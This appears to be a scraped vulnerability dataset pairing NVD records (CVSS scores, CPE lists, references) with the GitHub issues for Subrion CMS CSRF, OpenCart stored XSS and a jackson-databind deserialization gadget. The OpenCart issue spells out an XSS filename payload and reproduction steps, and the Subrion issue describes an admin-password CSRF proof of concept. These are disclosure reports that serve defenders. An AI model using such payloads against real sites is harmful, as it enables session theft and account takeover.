"ansible-config dump --only-changed" between quotes --> ```paste below default ``` ##### OS / ENVIRONMENT <!--- Provide all relevant information below, e.g. target OS versions, network device firmware, etc. --> ##### STEPS TO REPRODUCE <!--- Describe exactly how to reproduce the problem, using a minimal test-case --> <!--- Paste example playbooks or commands between quotes below --> ```yaml ``` <!--- HINT: You can paste gist.github.com links for larger files --> ##### EXPECTED RESULTS <!--- Describe what you expected to happen when running the steps above --> ##### ACTUAL RESULTS <!--- Describe what actually happened. If possible run with extra verbosity (-vvvv) --> <!--- Paste verbatim command output between quotes --> ```paste below ```
ansible-vault edit race condition
https://api.github.com/repos/ansible/ansible/issues/67798/comments
2
2020-02-26T20:00:23Z
2020-05-01T13:00:18Z
https://github.com/ansible/ansible/issues/67798
571,622,922
67,798
1,117
CVE-2018-21037
2020-03-17T15:15:12.643
Subrion CMS 4.1.5 (and possibly earlier versions) allow CSRF to change the administrator password via the panel/members/edit/1 URI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/intelliants/subrion/issues/638" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/intelliants/subrion/issues/638" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:intelliants:subrion:*:*:*:*:*:*:*:*", "matchCriteriaId": "6B85D0B5-A4C7-4405-BE56-E90E20F3678E", "versionEndExcluding": null, "versionEndIncluding": "4.1.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/intelliants/subrion/issues/638
[ "Exploit", "Third Party Advisory" ]
github.com
[ "intelliants", "subrion" ]
Hi Team, The application is vulnerable to CSRF attack. Affected Application Version: Subrion CMS 4.1.5 The attacker can change the administrator password by sending a crafted request to the application on change password field. The application is not validating the source origin of the request is coming from also CSRF token is not implemented. **Proof of concept as given below** 1. Crafted Code of Change Password of Administrator User. ![csrf attacke code](https://user-images.githubusercontent.com/36395331/36137449-4ad05bc4-10bb-11e8-8618-f3530ac7901e.png) 2. Crafted Request to Change the Password of Administrator. ![csrf crafted request](https://user-images.githubusercontent.com/36395331/36137562-d87d58be-10bb-11e8-8487-a437b069cb0c.png) 3. The Password is Changed Successfully. ![password changed successfully](https://user-images.githubusercontent.com/36395331/36137619-14e3da9e-10bc-11e8-8fce-ead0a1cc9a26.png) Recommendation: 1. Implement CSRF Token. 2. Validate the Source Origin When you fix the bug, please, can you include my name in the release notes when the bug will be corrected? Name : Tushar Kadam Email : kadatushar@gmail.com Thank you.
CSRF Attack On Change Password!
https://api.github.com/repos/intelliants/subrion/issues/638/comments
2
2018-02-13T07:26:55Z
2018-05-18T12:36:32Z
https://github.com/intelliants/subrion/issues/638
296,637,859
638
1,118
CVE-2020-10596
2020-03-17T15:15:14.253
OpenCart 3.0.3.2 allows remote authenticated users to conduct XSS attacks via a crafted filename in the users' image upload section.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://packetstormsecurity.com/files/157908/OpenCart-3.0.3.2-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opencart/opencart/issues/7810" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://packetstormsecurity.com/files/157908/OpenCart-3.0.3.2-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opencart/opencart/issues/7810" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opencart:opencart:3.0.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "7F78529D-B518-4ACB-8107-C210EE4A6FEF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/opencart/opencart/issues/7810
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "opencart", "opencart" ]
**What version of OpenCart are you reporting this for?** Opencart 3.0.3.2 **Describe the bug** Stored Cross Site Scripting (XSS) - Authenticated is found in users image upload section in opencart admin panel. Opencart is accepting filenames with arbitrary code in it and not escaping them so the JavaScript get executed. Malicious script in the admin dashboard can be injected permanently and can be used to steal the user’s sensitive information like cookies, keystrokes, account information etc **To Reproduce** Steps to reproduce the behavior: 1. Go to localhost.com/opencart/admin and login with credentials. 2. Then navigate to System>Users>Users and click on Action button on top right corner. ![Screenshot from 2020-01-09 09-46-46](https://user-images.githubusercontent.com/17331670/72037220-77518a00-32c5-11ea-88b6-9ee94181bb98.png) 3. Now in image field , click on image and upload a new image. Before this select any image file and rename with this XSS payload *"><svg onload=alert("XSS")>* and then upload it as new user profile image. 4. After the upload completes the XSS pop-up executes as shown below and it will gets executed each time someone visits the **Image manager** section. ![Screenshot from 2020-01-09 09-58-24](https://user-images.githubusercontent.com/17331670/72037961-ed56f080-32c7-11ea-9ac8-a83017d162c7.png) **Expected behavior** Escaping and sanitation of HTML tags/ Special characters before storing or processing them, so that the code does not executes. Although XSS was strictly filtered on other sections, here we were able to execute it because of filename so filenames, file extensions and headers should be analyzed to prevent XSS and other file upload vulnerabilities. **Screenshots / Screen recordings** [opencart stored XSS.zip](https://github.com/opencart/opencart/files/4038533/opencart.stored.XSS.zip) **Server / Test environment (please complete the following information):** - Kali Linux 4.19.0 - PHP version: 7.1.32 - Apache version: 2.4.41 - Browser(s) tested with: Mozilla Firefox Latest Build
Stored Cross Site Scripting - (Authenticated) on Opencart Admin Dashboard
https://api.github.com/repos/opencart/opencart/issues/7810/comments
13
2020-01-09T04:23:52Z
2020-12-23T20:14:26Z
https://github.com/opencart/opencart/issues/7810
547,239,674
7,810
1,119
CVE-2020-10672
2020-03-18T22:15:12.313
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2659" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200403-0002/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2659" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200403-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "77F8EDB1-5890-4054-84FF-2034C7D2ED96", "versionEndExcluding": "2.9.10.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "C650FEDB-E903-4C2D-AD40-282AB5F2E3C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "97994257-C9A4-4491-B362-E8B25B7187AB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*", "matchCriteriaId": "BBE7BF09-B89C-4590-821E-6C0587E096B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*", "matchCriteriaId": "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*", "matchCriteriaId": "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*", "matchCriteriaId": "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*", "matchCriteriaId": "18127694-109C-4E7E-AE79-0BA351849291", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*", "matchCriteriaId": "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*", "matchCriteriaId": "5343F8F8-E8B4-49E9-A304-9C8A608B8027", "versionEndExcluding": null, "versionEndIncluding": "2.9.0", "versionStartExcluding": null, "versionStartIncluding": "2.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "46059231-E7F6-4402-8119-1C7FE4ABEA96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "113E281E-977E-4195-B131-B7C7A2933B6E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "D01A0BBC-DA0E-4AFE-83BF-4F3BA01653EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", "matchCriteriaId": "526E2FE5-263F-416F-8628-6CD40B865780", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "B51F78F4-8D7E-48C2-86D1-D53A6EB348A7", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "987811D5-DA5E-493D-8709-F9231A84E5F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "0DB23B9A-571E-4B77-B432-23F3DC9B67D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*", "matchCriteriaId": "2AB443D1-D8E0-4253-9E1C-B62AEBBE582A", "versionEndExcluding": null, "versionEndIncluding": "12.0.3", "versionStartExcluding": null, "versionStartIncluding": "12.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "ECC00750-1DBF-401F-886E-E0E65A277409", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E5416A1-EE58-415D-9645-B6A875EBAED2", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "11B0C37E-D7C7-45F2-A8D8-5A3B1B191430", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "7582B307-3899-4BBB-B868-BC912A4D0109", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", "matchCriteriaId": "021014B2-DC51-481C-BCFE-5857EFBDEDDA", "versionEndExcluding": null, "versionEndIncluding": "8.1.0", "versionStartExcluding": null, "versionStartIncluding": "8.0.6", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "37C8EE84-A840-4132-B331-C7D450B1FBBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "1D8436A2-9CA3-4C91-B632-9B03368ABC1B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A00142E6-EEB3-44BD-AB0D-0E5C5640557F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "4A01F8ED-64DA-43BC-9C02-488010BCD0F4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "75638A6A-88B2-4BC7-84EA-1CF5FC30D555", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_retail_customer_analytics:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "1FBF422E-3F67-4599-A7C1-0E2E4224553A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "A8200D5C-D3C7-4936-84A7-37864DEEC62B", "versionEndExcluding": "12.2.0.1.20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2.25:*:*:*:*:*:*:*", "matchCriteriaId": "72F28CE3-F835-4458-8D70-CBE9FC2F7E7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0.15:*:*:*:*:*:*:*", "matchCriteriaId": "9F058FDA-04BC-4F32-830D-206983770692", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*", "matchCriteriaId": "6E46AE88-E9F8-41CB-B15F-12F5127A1E8D", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*", "matchCriteriaId": "A3D635AE-5E4A-47FB-9FCA-D82D52A61367", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", "matchCriteriaId": "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", "versionEndExcluding": null, "versionEndIncluding": "17.12", "versionStartExcluding": null, "versionStartIncluding": "17.7", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", "matchCriteriaId": "D55A54FD-7DD1-49CD-BE81-0BE73990943C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", "matchCriteriaId": "82EB08C0-2D46-4635-88DF-E54F6452D3A3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", "matchCriteriaId": "202AD518-2E9B-4062-B063-9858AE1F9CE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", "matchCriteriaId": "10864586-270E-4ACF-BDCC-ECFCD299305F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "792DF04A-2D1B-40B5-B960-3E7152732EB8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*", "matchCriteriaId": "7DA6E92C-AC3B-40CF-96AE-22CD8769886F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*", "matchCriteriaId": "378A6656-252B-4929-83EA-BC107FDFD357", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "363395FA-C296-4B2B-9D6F-BCB8DBE6FACE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "F62A2144-5EF8-4319-B8C2-D7975F51E5FA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "11DA6839-849D-4CEF-85F3-38FE75E07183", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "BCE78490-A4BE-40BD-8C72-0A4526BBD4A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*", "matchCriteriaId": "55AE3629-4A66-49E4-A33D-6D81CC94962F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*", "matchCriteriaId": "4CB39A1A-AD29-45DD-9EB5-5E2053A01B9A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*", "matchCriteriaId": "27C26705-6D1F-4D5E-B64D-B479108154FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "F14A818F-AA16-4438-A3E4-E64C9287AC66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2659
[ "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget type(s) reported regarding class(es) of `org.apache.aries.transaction.jms`. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. CVE id: CVE-2020-10672 Reporter: Srikanth Ramu, threedr3am'follower, (concurrent reports) Fix will be included in: * 2.9.10.4 * Does not affect 2.10.0 and later
Block one more gadget type (aries.transaction.jms, CVE-2020-10672)
